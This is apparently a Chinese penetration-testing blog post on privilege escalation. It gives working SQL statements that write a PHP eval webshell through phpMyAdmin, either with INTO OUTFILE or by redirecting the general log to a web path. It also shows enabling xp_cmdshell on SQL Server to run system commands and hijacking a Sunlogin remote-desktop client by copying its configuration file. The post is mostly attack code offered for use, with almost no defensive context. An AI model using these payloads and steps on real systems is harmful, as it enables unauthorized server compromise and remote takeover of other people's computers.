0%

phpmyadmin,sqlserver,向日葵提权.md

phpmyadmin提权

SQL语句写getshell

前提条件

  • 已知web应用绝对路径。
  • mysql配置文件中secure_file_priv的值为空。

复现步骤

设置secure_file_priv的值为空:
image
重启配置生效:
image

查看是否具有写入权限:

1
show global variables like '%secure%';

image

  • secure_file_privnull表示不允许导入导出;
  • secure_file_priv指定文件夹时,表示mysql的导入导出只能在指定的文件夹;
  • secure_file_priv没有设置时,则表示没有任何限制;

web绝对路径

  • 利用mysql的特性select @@basedir
    image
    这里很明显是用了宝塔集成环境,那么默认路径是C:/wwwroot
  • phpinfo信息泄露
    image
  • 通过报错

写入一句话木马:

1
select '<?php @eval($_POST[cmd]);?>'INTO OUTFILE 'C://wwwroot//shell.php';

image
使用蚁剑连接
image

日志变量getshell

  1. 开启日志保存并修改保存位置
    1
    2
    SET global general_log = "ON";
    SET global general_log_file='C://wwwroot//shell2.php';
  2. 我们在SQL查询的框中写入
    1
    select "<?php eval($_POST['cmd']);?>";
  3. 蚁剑连接
    image

SQL server提权

开启xp_cmdshell

1
2
3
4
5
6
sp_configure 'show advanced options',1
reconfigure
go
sp_configure 'xp_cmdshell',1
reconfigure
go

image
执行系统命令:
image

向日葵远程连接提权:

如果目标机器安装了向日葵:
默认位置:

1
C:/Program Files/Oray/SunLogin/SunloginClient

我们在自己电脑上同样安装一个向日葵,修改自己的配置文件改为他的配置文件:
image
这时,连接密码就一样了:
image
识别码在这里:
image
然后就远程连接了他的电脑:
image